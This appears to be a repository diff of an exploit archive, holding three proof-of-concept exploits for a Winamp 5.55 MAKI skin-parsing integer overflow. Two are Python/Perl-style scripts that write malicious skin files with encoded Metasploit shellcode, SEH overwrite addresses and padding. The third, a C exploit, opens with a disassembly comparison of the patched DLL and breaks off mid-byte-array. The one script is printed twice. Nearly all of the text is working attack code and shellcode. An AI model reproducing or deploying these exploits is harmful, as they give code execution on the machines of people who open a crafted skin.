"\x34\x2e\x70\x6e\x67\x3c\x2f\x73\x63\x72\x65\x65\x6e\x73\x68\x6f\x74\x3e\x0d\x0a\x09\x09\x3c\x68\x6f"
"\x6d\x65\x70\x61\x67\x65\x3e\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x73\x6e\x61\x6b\x65\x73\x70"
"\x63\x2e\x63\x6f\x6d\x2f\x3c\x2f\x68\x6f\x6d\x65\x70\x61\x67\x65\x3e\x0d\x0a\x09\x3c\x2f\x73\x6b\x69"
"\x6e\x69\x6e\x66\x6f\x3e\x0d\x0a\x0d\x0a\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x73\x20"
"\x73\x65\x63\x74\x69\x6f\x6e\x3d\x22\x67\x65\x6e\x65\x72\x61\x6c\x22\x3e\x0d\x0a\x09\x09\x3c\x61\x63"
"\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x41\x6c\x74\x2b\x46\x22\x20\x61\x63"
"\x74\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48\x4f\x54\x4b\x45\x59\x5f\x46\x49\x4c\x45\x22\x20\x2f\x3e"
"\x0d\x0a\x09\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x41\x6c"
"\x74\x2b\x50\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48\x4f\x54\x4b\x45\x59\x5f\x50"
"\x4c\x41\x59\x22\x20\x2f\x3e\x0d\x0a\x09\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62"
"\x69\x6e\x64\x3d\x22\x41\x6c\x74\x2b\x4f\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48"
"\x4f\x54\x4b\x45\x59\x5f\x4f\x50\x54\x49\x4f\x4e\x53\x22\x20\x2f\x3e\x0d\x0a\x09\x09\x3c\x61\x63\x63"
"\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x41\x6c\x74\x2b\x49\x22\x20\x61\x63\x74"
"\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48\x4f\x54\x4b\x45\x59\x5f\x56\x49\x45\x57\x22\x20\x2f\x3e\x0d"
"\x0a\x09\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x41\x6c\x74"
"\x2b\x48\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x4d\x45\x4e\x55\x48\x4f\x54\x4b\x45\x59\x5f\x48\x45"
"\x4c\x50\x22\x20\x2f\x3e\x0d\x0a\x09\x3c\x2f\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x73\x3e\x0d"
"\x0a\x0d\x0a\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x73\x20\x73\x65\x63\x74\x69\x6f\x6e"
"\x3d\x22\x6e\x6f\x72\x6d\x61\x6c\x22\x3e\x0d\x0a\x09\x09\x09\x3c\x61\x63\x63\x65\x6c\x65\x72\x61\x74"
"\x6f\x72\x20\x62\x69\x6e\x64\x3d\x22\x73\x70\x61\x63\x65\x22\x20\x61\x63\x74\x69\x6f\x6e\x3d\x22\x53"
"\x48\x4f\x57\x5f\x43\x55\x52\x52\x45\x4e\x54\x5f\x54\x52\x41\x43\x4b\x22\x20\x2f\x3e\x0d\x0a\x09\x3c"
"\x2f\x61\x63\x63\x65\x6c\x65\x72\x61\x74\x6f\x72\x73\x3e\x0d\x0a\x0d\x0a\x09\x3c\x21\x2d\x2d\x20\x54"
"\x68\x69\x73\x20\x53\x6b\x69\x6e\x20\x75\x73\x65\x73\x20\x73\x68\x61\x72\x65\x64\x20\x47\x72\x61\x70"
"\x68\x69\x63\x73\x2c\x20\x58\x4d\x4c\x20\x61\x6e\x64\x20\x4d\x61\x6b\x69\x20\x66\x72\x6f\x6d\x20\x27"
"\x42\x69\x67\x20\x42\x65\x6e\x74\x6f\x27\x20\x2d\x2d\x3e\x0d\x0a\x0d\x0a\x09\x3c\x73\x63\x72\x69\x70"
"\x74\x73\x3e\x0d\x0a\x09\x09\x3c\x73\x63\x72\x69\x70\x74\x20\x66\x69\x6c\x65\x3d\x22\x2f\x73\x63\x72"
"\x69\x70\x74\x73\x2f\x32\x37\x2e\x6d\x61\x6b\x69\x22\x20\x70\x61\x72\x61\x6d\x3d\x22\x73\x6d\x61\x6c"
"\x6c\x22\x2f\x3e\x20\x3c\x21\x2d\x2d\x20\x4d\x75\x73\x74\x20\x62\x65\x20\x6c\x6f\x61\x64\x65\x64\x20"
"\x61\x74\x20\x66\x69\x72\x73\x74\x20\x2d\x2d\x3e\x0d\x0a\x09\x3c\x2f\x73\x63\x72\x69\x70\x74\x73\x3e"
"\x0d\x0a\x0d\x0a\x3c\x2f\x57\x69\x6e\x61\x6d\x70\x41\x62\x73\x74\x72\x61\x63\x74\x69\x6f\x6e\x4c\x61"
"\x79\x65\x72\x3e")
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x53\x4b\x48\x4e\x47"
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x54\x4a\x31\x4b\x38"
"\x4f\x55\x42\x32\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x33\x4b\x48"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x45\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x44"
"\x4b\x58\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48"
"\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x30\x43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x58\x42\x54\x42\x33\x45\x58\x42\x4c\x4a\x57"
"\x4e\x30\x4b\x58\x42\x34\x4e\x50\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x46\x4e\x43\x4f\x55\x41\x43"
"\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47"
"\x42\x35\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x56\x43\x46\x42\x50\x5a")
payload = "\x41"*16756
payload += "\x74\x06\x90\x90"
payload += "\x32\x55\xF0\x12" # universal p/p/r in_mod.dll
payload += shellcode
try:
os.mkdir("dz_skin")
os.mkdir("dz_skin/scripts")
out_maki = open(r'dz_skin/scripts/27.maki', 'w')
out_maki.write(header1+payload+header2)
out_maki.close()
out_xml = open(r'dz_skin/skin.xml', 'w')
out_xml.write(skin_xml)
out_xml.close()
raw_input("\nSkin's files created!\n")
except:
print "Error"
# milw0rm.com [2009-05-22]

214
platforms/windows/local/8772.pl
View file

@ -1,107 +1,107 @@
# Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit
# By: Encrypt3d.M!nd
#
# Based on: http://milw0rm.com/exploits/8767
#
# place "mcvcore.maki" on "\Winamp\Skins\Bento\scripts" and run winmap
#
# NOTE:i've tested this on version 5.51,if it isn't workin' with your version.
# just edit the calculations of the chars
#
header = (
"\x46\x47\x03\x04\x17\x00\x00\x00\x2A\x00\x00\x00"
"\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5"
"\x32\x35\xF3\xE7\x64\x0F\xF5\xD6\xFA\x93\xB7\x49"
"\x93\xF1\xBA\x66\xEF\xAE\x3E\x98\x7B\xC4\x0D\xE9"
"\x0D\x84\xE7\x4A\xB0\x2C\x04\x0B\xD2\x75\xF7\xFC"
"\xB5\x3A\x02\xB2\x4D\x43\xA1\x4B\xBE\xAE\x59\x63"
"\x75\x03\xF3\xC6\x78\x57\xC6\x87\x43\xE7\xFE\x49"
"\x85\xF9\x09\xCC\x53\x2A\xFD\x56\x65\x36\x60\x38"
"\x1B\x46\xA7\x42\xAA\x75\xD8\x3F\x66\x67\xBF\x73"
"\xF4\x7A\x78\xF4\xBB\xB2\xF7\x4E\x9C\xFB\xE7\x4B"
"\xA9\xBE\xA8\x8D\x02\x0C\x37\x3A\xBF\x3C\x9F\x43"
"\x84\xF1\x86\x88\x5B\xCF\x1E\x36\xB6\x5B\x0C\x5D"
"\xE1\x7D\x1F\x4B\xA7\x0F\x8D\x16\x59\x94\x19\x41"
"\x99\xE1\xE3\x4E\x36\xC6\xEC\x4B\x97\xCD\x78\xBC"
"\x9C\x86\x28\xB0\xE5\x95\xBE\x45\x72\x20\x91\x41"
"\x93\x5C\xBB\x5F\xF9\xF1\x17\xFD\x4E\x6D\x90\x60"
"\x7E\x53\x2E\x48\xB0\x04\xCC\x94\x61\x88\x56\x72"
"\xC0\xBC\x3A\x40\x22\x6F\xD6\x4B\x8B\xA4\x10\xC8"
"\x29\x93\x25\x47\x4D\x3E\xAA\x97\xD0\xF4\xA8\x4F"
"\x81\x7B\x0D\x0A\xF2\x2A\x45\x49\x83\xFA\xBB\xE4"
"\x64\xF4\x81\xD9\x49\xB0\xC0\xA8\x5B\x2E\xC3\xBC"
"\xFD\x3F\x5E\xB6\x62\x5E\x37\x8D\x40\x8D\xEA\x76"
"\x81\x4A\xB9\x1B\x77\xBE\x97\x4F\xCE\xB0\x77\x19"
"\x4E\x99\x56\xD4\x98\x33\xC9\x6C\x27\x0D\x20\xC2"
"\xA8\xEB\x51\x2A\x4B\xBA\x7F\x5D\x4B\xC6\x5D\x4C"
"\x71\x38\xBA\x1E\x8D\x9E\x48\x3E\x48\xB9\x60\x8D"
"\x1F\x43\xC5\xC4\x05\x40\xC9\x08\x0F\x39\xAF\x23"
"\x4B\x80\xF3\xB8\xC4\x8F\x7E\xBB\x59\x72\x86\xAA"
"\xEF\x0E\x31\xFA\x41\xB7\xDC\x85\xA9\x52\x5B\xCB"
"\x4B\x44\x32\xFD\x7D\x51\x37\x7C\x4E\xBF\x40\x82"
"\xAE\x5F\x3A\xDC\x33\x15\xFA\xB9\x5A\x7D\x9A\x57"
"\x45\xAB\xC8\x65\x57\xA6\xC6\x7C\xA9\xCD\xDD\x8E"
"\x69\x1E\x8F\xEC\x4F\x9B\x12\xF9\x44\xF9\x09\xFF"
"\x45\x27\xCD\x64\x6B\x26\x5A\x4B\x4C\x8C\x59\xE6"
"\xA7\x0C\xF6\x49\x3A\xE4\x05\xCB\x6D\xC4\x8A\xC2"
"\x48\xB1\x93\x49\xF0\x91\x0E\xF5\x4A\xFF\xCF\xDC"
"\xB4\xFE\x81\xCC\x4B\x96\x1B\x72\x0F\xD5\xBE\x0F"
"\xFF\xE1\x8C\xE2\x01\x59\xB0\xD5\x11\x97\x9F\xE4"
"\xDE\x6F\x51\x76\x0D\x0A\xBD\xF8\xF0\x80\xA5\x1B"
"\xA6\x42\xA0\x93\x32\x36\xA0\x0C\x8D\x4A\x1B\x34"
"\x2E\x9B\x98\x6C\xFA\x40\x8B\x85\x0C\x1B\x6E\xE8"
"\x94\x05\x71\x9B\xD5\x36\xFD\x03\xF8\x4A\x97\x95"
"\x05\x02\xB7\xDB\x26\x7A\x10\xF2\xD5\x7F\xC4\xAC"
"\xDF\x48\xA6\xA0\x54\x51\x57\x6C\xDC\x76\x35\xA5"
"\xBA\xB5\xB3\x05\xCB\x4D\xAD\xC1\xE6\x18\xD2\x8F"
"\x68\x96\xC1\xFE\x29\x61\xB7\xDA\x51\x4D\x91\x65"
"\x01\xCA\x0C\x1B\x70\xDB\xF7\x14\x95\xD5\x36\xED"
"\xE8\x45\x98\x0F\x3F\x4E\xA0\x52\x2C\xD9\x82\x4B"
"\x3B\x9B\x7A\x66\x0E\x42\x8F\xFC\x79\x41\x15\x80"
"\x9C\x02\x99\x31\xED\xC7\x19\x53\x98\x47\x98\x63"
"\x60\xB1\x5A\x29\x8C\xAA\x4D\xC1\xBB\xE2\xF6\x84"
"\x73\x41\xBD\xB3\xB2\xEB\x2F\x66\x55\x50\x94\x05"
"\xC0\x73\x1F\x96\x1B\x40\x9B\x1B\x67\x24\x27\xAC"
"\x41\x65\x22\xBA\x3D\x59\x77\xD0\x76\x49\xB9\x52"
"\xF4\x71\x36\x55\x40\x0B\x82\x02\x03\xD4\xAB\x3A"
"\x87\x4D\x87\x8D\x12\x32\x6F\xAD\xFC\xD5\x83\xC2"
"\xDE\x24\x6E\xB7\x36\x4A\x8C\xCC\x9E\x24\xC4\x6B"
"\x6C\x73\x37\x00")
ex = (
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF")
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d"
"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c"
"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45"
"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36"
"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e"
"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a"
"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d"
"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74"
"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57"
"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38"
"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b"
"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77"
"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b"
"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53"
"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f"
"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31"
"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50"
"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37"
"\x70\x41")
chars = "A" * 301
chars2= "B" * 16100
file=open('mcvcore.maki','w')
file.write(header+ex+chars+"\xeb\x12\x41\x41"+"\x11\x10\xf0\x14"+"\x90"*20+shellcode+chars2)
file.close()
# milw0rm.com [2009-05-22]
# Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit
# By: Encrypt3d.M!nd
#
# Based on: http://milw0rm.com/exploits/8767
#
# place "mcvcore.maki" on "\Winamp\Skins\Bento\scripts" and run winmap
#
# NOTE:i've tested this on version 5.51,if it isn't workin' with your version.
# just edit the calculations of the chars
#
header = (
"\x46\x47\x03\x04\x17\x00\x00\x00\x2A\x00\x00\x00"
"\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5"
"\x32\x35\xF3\xE7\x64\x0F\xF5\xD6\xFA\x93\xB7\x49"
"\x93\xF1\xBA\x66\xEF\xAE\x3E\x98\x7B\xC4\x0D\xE9"
"\x0D\x84\xE7\x4A\xB0\x2C\x04\x0B\xD2\x75\xF7\xFC"
"\xB5\x3A\x02\xB2\x4D\x43\xA1\x4B\xBE\xAE\x59\x63"
"\x75\x03\xF3\xC6\x78\x57\xC6\x87\x43\xE7\xFE\x49"
"\x85\xF9\x09\xCC\x53\x2A\xFD\x56\x65\x36\x60\x38"
"\x1B\x46\xA7\x42\xAA\x75\xD8\x3F\x66\x67\xBF\x73"
"\xF4\x7A\x78\xF4\xBB\xB2\xF7\x4E\x9C\xFB\xE7\x4B"
"\xA9\xBE\xA8\x8D\x02\x0C\x37\x3A\xBF\x3C\x9F\x43"
"\x84\xF1\x86\x88\x5B\xCF\x1E\x36\xB6\x5B\x0C\x5D"
"\xE1\x7D\x1F\x4B\xA7\x0F\x8D\x16\x59\x94\x19\x41"
"\x99\xE1\xE3\x4E\x36\xC6\xEC\x4B\x97\xCD\x78\xBC"
"\x9C\x86\x28\xB0\xE5\x95\xBE\x45\x72\x20\x91\x41"
"\x93\x5C\xBB\x5F\xF9\xF1\x17\xFD\x4E\x6D\x90\x60"
"\x7E\x53\x2E\x48\xB0\x04\xCC\x94\x61\x88\x56\x72"
"\xC0\xBC\x3A\x40\x22\x6F\xD6\x4B\x8B\xA4\x10\xC8"
"\x29\x93\x25\x47\x4D\x3E\xAA\x97\xD0\xF4\xA8\x4F"
"\x81\x7B\x0D\x0A\xF2\x2A\x45\x49\x83\xFA\xBB\xE4"
"\x64\xF4\x81\xD9\x49\xB0\xC0\xA8\x5B\x2E\xC3\xBC"
"\xFD\x3F\x5E\xB6\x62\x5E\x37\x8D\x40\x8D\xEA\x76"
"\x81\x4A\xB9\x1B\x77\xBE\x97\x4F\xCE\xB0\x77\x19"
"\x4E\x99\x56\xD4\x98\x33\xC9\x6C\x27\x0D\x20\xC2"
"\xA8\xEB\x51\x2A\x4B\xBA\x7F\x5D\x4B\xC6\x5D\x4C"
"\x71\x38\xBA\x1E\x8D\x9E\x48\x3E\x48\xB9\x60\x8D"
"\x1F\x43\xC5\xC4\x05\x40\xC9\x08\x0F\x39\xAF\x23"
"\x4B\x80\xF3\xB8\xC4\x8F\x7E\xBB\x59\x72\x86\xAA"
"\xEF\x0E\x31\xFA\x41\xB7\xDC\x85\xA9\x52\x5B\xCB"
"\x4B\x44\x32\xFD\x7D\x51\x37\x7C\x4E\xBF\x40\x82"
"\xAE\x5F\x3A\xDC\x33\x15\xFA\xB9\x5A\x7D\x9A\x57"
"\x45\xAB\xC8\x65\x57\xA6\xC6\x7C\xA9\xCD\xDD\x8E"
"\x69\x1E\x8F\xEC\x4F\x9B\x12\xF9\x44\xF9\x09\xFF"
"\x45\x27\xCD\x64\x6B\x26\x5A\x4B\x4C\x8C\x59\xE6"
"\xA7\x0C\xF6\x49\x3A\xE4\x05\xCB\x6D\xC4\x8A\xC2"
"\x48\xB1\x93\x49\xF0\x91\x0E\xF5\x4A\xFF\xCF\xDC"
"\xB4\xFE\x81\xCC\x4B\x96\x1B\x72\x0F\xD5\xBE\x0F"
"\xFF\xE1\x8C\xE2\x01\x59\xB0\xD5\x11\x97\x9F\xE4"
"\xDE\x6F\x51\x76\x0D\x0A\xBD\xF8\xF0\x80\xA5\x1B"
"\xA6\x42\xA0\x93\x32\x36\xA0\x0C\x8D\x4A\x1B\x34"
"\x2E\x9B\x98\x6C\xFA\x40\x8B\x85\x0C\x1B\x6E\xE8"
"\x94\x05\x71\x9B\xD5\x36\xFD\x03\xF8\x4A\x97\x95"
"\x05\x02\xB7\xDB\x26\x7A\x10\xF2\xD5\x7F\xC4\xAC"
"\xDF\x48\xA6\xA0\x54\x51\x57\x6C\xDC\x76\x35\xA5"
"\xBA\xB5\xB3\x05\xCB\x4D\xAD\xC1\xE6\x18\xD2\x8F"
"\x68\x96\xC1\xFE\x29\x61\xB7\xDA\x51\x4D\x91\x65"
"\x01\xCA\x0C\x1B\x70\xDB\xF7\x14\x95\xD5\x36\xED"
"\xE8\x45\x98\x0F\x3F\x4E\xA0\x52\x2C\xD9\x82\x4B"
"\x3B\x9B\x7A\x66\x0E\x42\x8F\xFC\x79\x41\x15\x80"
"\x9C\x02\x99\x31\xED\xC7\x19\x53\x98\x47\x98\x63"
"\x60\xB1\x5A\x29\x8C\xAA\x4D\xC1\xBB\xE2\xF6\x84"
"\x73\x41\xBD\xB3\xB2\xEB\x2F\x66\x55\x50\x94\x05"
"\xC0\x73\x1F\x96\x1B\x40\x9B\x1B\x67\x24\x27\xAC"
"\x41\x65\x22\xBA\x3D\x59\x77\xD0\x76\x49\xB9\x52"
"\xF4\x71\x36\x55\x40\x0B\x82\x02\x03\xD4\xAB\x3A"
"\x87\x4D\x87\x8D\x12\x32\x6F\xAD\xFC\xD5\x83\xC2"
"\xDE\x24\x6E\xB7\x36\x4A\x8C\xCC\x9E\x24\xC4\x6B"
"\x6C\x73\x37\x00")
ex = (
"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF")
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d"
"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c"
"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45"
"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36"
"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e"
"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a"
"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d"
"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74"
"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57"
"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38"
"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b"
"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77"
"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b"
"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53"
"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f"
"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31"
"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50"
"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37"
"\x70\x41")
chars = "A" * 301
chars2= "B" * 16100
file=open('mcvcore.maki','w')
file.write(header+ex+chars+"\xeb\x12\x41\x41"+"\x11\x10\xf0\x14"+"\x90"*20+shellcode+chars2)
file.close()
# milw0rm.com [2009-05-22]

712
platforms/windows/local/8783.c
View file

@ -1,356 +1,356 @@
/**************************************************************
Winamp 5.551 MAKI Parsing Integer Overflow Exploit !!!
Tested on :Vista sp1 and Xpsp3
Release Date :May 22 2009
Venders web site :http://www.winamp.com/
Version Tested:Winamp 5.551
Not vulnerable :Winamp 5.552
Credits to Monica Sojeong Hong down at vrt-sourcefire for the overflow.
http://vrt-sourcefire.blogspot.com
As we know we are able to overwrite the exception handlers so
we can exploit this on multiple OS i tested these on xpsp3 <eng>
<Vista sp1> And all worked fine.
I wrote the exploits because i had tried the 2 exploits posted
on milw0rm they were tested on winxp sp3 and vista sp1 and i couldn't
get them to execute shell code which prompted me into writing my
own version!!
Below i have provided a look into the disassembly of the new
changes in the 555.2 version of winamp the main change was in
gen_ff.dll.
---snip--
A quick look at the new gen_ff.dll.
----------------------------------
loc_12094F62:
mov ax, [ebx]
movzx edi, ax -Extends ax into edi register.-
inc ebx
push edi ; Size
inc ebx
lea eax, [ebp+MultiByteStr]
push ebx ; Src
push eax ; Dst
call memmove
------------------------
loc_120951E9:
mov edi, [ebx]
add ebx, 4
mov ax, [ebx]
movzx esi, ax -Extends ax into esi register.-
inc ebx
push esi ; Size
inc ebx
lea eax, [ebp+var_2014C] <-- This was also changed.
push ebx ; Src
push eax ; Dst
call memmove
This is a simple run down of the new patch
that was applied to winamp winamp 5.552 If we look closely we can see they
changed the sign extension.
=555.1 .dll=
----------
movsx esi, ax = movsx(dest , source );
Copies source operand dest and extends the value.
Changed in the new gen_ff.dll.
=555.2 .dll=
----------
movzx esi, ax
Zero extend the 8 bit registers.
Copies data and sign extends the data while copying it.
Destination= 16 - 32 bit.
Source = 8 or a 16byte or maybe even 1 byte of memory
Source = the destination must be of greater value than the source.
This was a few of the changes within the new dll from winamp.Im
sure if you want to dig deeper you can get both dll and compare them
to see the changes that are made.So basically they have changed the
instruction from Copy with sign extension to copy with zero extension.
This can also be displayed when looking at the stack at the time of the
exception in the new version of winamp after steeping through the exception
although we can cause and exception we cant overwrite the 4 bytes on the
stack we can only overwrite 2 and it is always capped with 00FF.
---snip--
Special thanks to str0ke :)
Credits to n00b for writing exploit code !!
Progression is always a good thing.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
***************************************************************/
#include <stdio.h>
#define MAKI "mcvcore.maki"
unsigned char First_Header[] =
{
0x46, 0x47, 0x03, 0x04, 0x17, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x00, 0x00,
0x71, 0x49, 0x65, 0x51, 0x87, 0x0D, 0x51, 0x4A, 0x91, 0xE3, 0xA6, 0xB5,
0x32, 0x35, 0xF3, 0xE7, 0x64, 0x0F, 0xF5, 0xD6, 0xFA, 0x93, 0xB7, 0x49,
0x93, 0xF1, 0xBA, 0x66, 0xEF, 0xAE, 0x3E, 0x98, 0x7B, 0xC4, 0x0D, 0xE9,
0x0D, 0x84, 0xE7, 0x4A, 0xB0, 0x2C, 0x04, 0x0B, 0xD2, 0x75, 0xF7, 0xFC,
0xB5, 0x3A, 0x02, 0xB2, 0x4D, 0x43, 0xA1, 0x4B, 0xBE, 0xAE, 0x59, 0x63,
0x75, 0x03, 0xF3, 0xC6, 0x78, 0x57, 0xC6, 0x87, 0x43, 0xE7, 0xFE, 0x49,
0x85, 0xF9, 0x09, 0xCC, 0x53, 0x2A, 0xFD, 0x56, 0x65, 0x36, 0x60, 0x38,
0x1B, 0x46, 0xA7, 0x42, 0xAA, 0x75, 0xD8, 0x3F, 0x66, 0x67, 0xBF, 0x73,
0xF4, 0x7A, 0x78, 0xF4, 0xBB, 0xB2, 0xF7, 0x4E, 0x9C, 0xFB, 0xE7, 0x4B,
0xA9, 0xBE, 0xA8, 0x8D, 0x02, 0x0C, 0x37, 0x3A, 0xBF, 0x3C, 0x9F, 0x43,
0x84, 0xF1, 0x86, 0x88, 0x5B, 0xCF, 0x1E, 0x36, 0xB6, 0x5B, 0x0C, 0x5D,
0xE1, 0x7D, 0x1F, 0x4B, 0xA7, 0x0F, 0x8D, 0x16, 0x59, 0x94, 0x19, 0x41,
0x99, 0xE1, 0xE3, 0x4E, 0x36, 0xC6, 0xEC, 0x4B, 0x97, 0xCD, 0x78, 0xBC,
0x9C, 0x86, 0x28, 0xB0, 0xE5, 0x95, 0xBE, 0x45, 0x72, 0x20, 0x91, 0x41,
0x93, 0x5C, 0xBB, 0x5F, 0xF9, 0xF1, 0x17, 0xFD, 0x4E, 0x6D, 0x90, 0x60,
0x7E, 0x53, 0x2E, 0x48, 0xB0, 0x04, 0xCC, 0x94, 0x61, 0x88, 0x56, 0x72,
